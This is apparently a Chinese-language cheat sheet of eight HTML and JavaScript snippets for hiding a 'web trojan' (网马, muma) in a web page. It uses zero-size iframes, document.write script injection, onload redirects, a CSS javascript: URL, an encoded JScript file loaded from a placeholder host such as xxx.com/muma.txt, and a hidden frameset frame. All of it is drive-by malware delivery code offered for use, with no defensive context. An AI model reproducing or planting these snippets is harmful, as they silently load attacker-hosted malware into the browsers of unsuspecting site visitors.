1。<iframe src=地址 width=0 height=0></iframe>
2  <script type=”javascript”>
document.write("<iframe width='0' height='0' src='地址'></iframe>");
</script>
3  <body onload="window.location='地址';"></body>
4 body { background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
5.<script language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
muma.txt可改成任意后缀
6.<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
7.<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
8.top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe height=”0” src="http://www.xxx.com/muma.htm/"></iframe>';